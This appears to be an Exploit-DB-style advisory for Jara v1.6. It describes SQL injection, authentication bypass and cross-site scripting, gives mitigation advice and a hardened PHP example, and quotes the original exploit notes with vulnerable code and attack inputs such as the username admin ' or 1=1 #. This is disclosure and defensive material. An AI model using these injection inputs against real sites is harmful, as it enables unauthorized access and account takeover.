Vendor: Jara
By: Or4nG.M4n
CVSS: 8.8 (HIGH)
SQL Injection, Authentication Bypass, Cross Site Scripting
CWE: 89, 287, 79
Product Name: Jara
Affected Version From: v1.6
Affected Version To: v1.6
Patch Exists: NO
Related CWE: N/A
CPE: a:jara:jara:1.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: My Mind (:)
2009

Jara v1.6 Multiple Vulnerabilities

Jara v1.6 is vulnerable to SQL Injection, Authentication Bypass and Cross Site Scripting. The SQL Injection vulnerability is in category.php, where the user-supplied id request parameter is placed in an SQL query without proper sanitization, so the query can be manipulated by injecting arbitrary SQL code. The Authentication Bypass vulnerability is in auth_fns.php, where the user-supplied username and password are likewise placed in an SQL query without proper sanitization; authentication can be bypassed by entering ' or 1=1 # as the username. The Cross Site Scripting vulnerability is in search.php, where the user-supplied search term is echoed into the HTML output without proper sanitization. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically construct SQL queries. Authentication should be done using a secure authentication mechanism. Input validation should be used to ensure that untrusted data is not used to dynamically construct HTML output.
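
The three mitigations applied to the code paths quoted in the Exploit-DB data below, as an added example that is not Jara's own code and not a vendor patch. Function names, schema and sample rows are constructed, an in-memory SQLite database via PDO stands in for Jara's MySQL backend, and the SHA1() comparison is swapped for PHP's password_hash()/password_verify().

```php
<?php
// Added example: hardened counterparts of the three quoted code paths.
// Function names, schema and sample rows are constructed. SQLite in-memory stands in
// for Jara's MySQL database so the script runs offline (needs the pdo_sqlite extension).

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jara_users (username TEXT PRIMARY KEY, password_hash TEXT)');
$db->exec('CREATE TABLE jara_posts (id INTEGER PRIMARY KEY, categoryid INTEGER, title TEXT)');
$db->prepare('INSERT INTO jara_users VALUES (?, ?)')
   ->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);
$db->exec("INSERT INTO jara_posts (categoryid, title) VALUES (1, 'Hello'), (2, 'Other')");

// category.php: accept only an integer id, then bind it instead of concatenating it.
function safe_posts_in_category(PDO $db, $rawId): array {
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false) {
        return [];   // non-integer ids are rejected before any query is built
    }
    $stmt = $db->prepare('SELECT id, title FROM jara_posts WHERE categoryid = ?');
    $stmt->execute([$id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// auth_fns.php: bind the username; verify the password in PHP against a salted hash
// (swapped in for the original SHA1() comparison inside the query).
function safe_authenticate(PDO $db, string $username, string $password): bool {
    $stmt = $db->prepare('SELECT password_hash FROM jara_users WHERE username = ? LIMIT 1');
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($password, $hash);
}

// search.php: encode the search term for the HTML context before echoing it.
function safe_result_line(int $numRows, string $term): string {
    $t = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p><strong>$numRows</strong> results for <strong>$t</strong>.</p>";
}

// The inputs quoted in the advisory are handled as plain data by the hardened functions.
var_dump(count(safe_posts_in_category($db, "999999.9'")));
var_dump(count(safe_posts_in_category($db, '1')));
var_dump(safe_authenticate($db, "admin ' or 1=1 #", 'anything'));
var_dump(safe_authenticate($db, 'admin', 'correct horse'));
echo safe_result_line(0, '<h1>DDD<h1>'), "\n";
```

The bound parameters keep the quoted username and id values out of the SQL grammar entirely, and the search term reaches the browser as text rather than markup.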

Exploit-DB raw data:

#!/Mohammed/bin/YahYa
# Jara v1.6 Multiple Vulnerabilities 
# -------------------------------------------[+]
# download : http://sourceforge.net/projects/jara/files/v1.6/jarav16.zip
# AutHOr   : Or4nG.M4n
# cOntAct  :  priv8te[at]hotmail.com
# versiOn  : v1.6
# Tested   : My Mind (:
# -------------------------------------------[+]
#
[ Exploit ] Sql injection ~ ~
|=> /category.php?id=999999.9'[Here]
# Vulnerable code : category.php
#		@$categoryid = $_REQUEST["id"]; <= [1]
#		$category = jara_get_category($categoryid); <=[2]
#		jara_page_start("Category: ".$category["title"]); <=[3]
#		$query = "select * from jara_posts where categoryid = '$categoryid'"; <=[4]
#		$result = jara_db_query($query); <=[5]
#
[ Exploit ] Auth Bypass ~
|=> admin ' or 1=1 # 
# Vulnerable code : auth_fns.php
#	    function jara_user_authenticate($username, $password) { <=[1]
#		$query = "select * from jara_users where username = '$username' and password = SHA1('$password') limit 1"; <=[2]
#		$result = jara_db_query($query); <=[3]
#
[ Exploit ] Cross Site Scripting ~
|=> POST : <h1>DDD<h1> => your xss Code
# Vulnerable code : search.php
#			$num_rows = $result->num_rows;
#			echo "<p><strong>$num_rows</strong> results for <strong>".stripslashes($term)."</strong>.</p>";
# ~ End
# -------------------------------------------[+]
#  Greet : sA^Dev!L , xSs m4n , Tryag Team 
# Cyb3r-Crystal , Dr.Banned [Miss u] , i-hmx
# -------------------------------------------[+]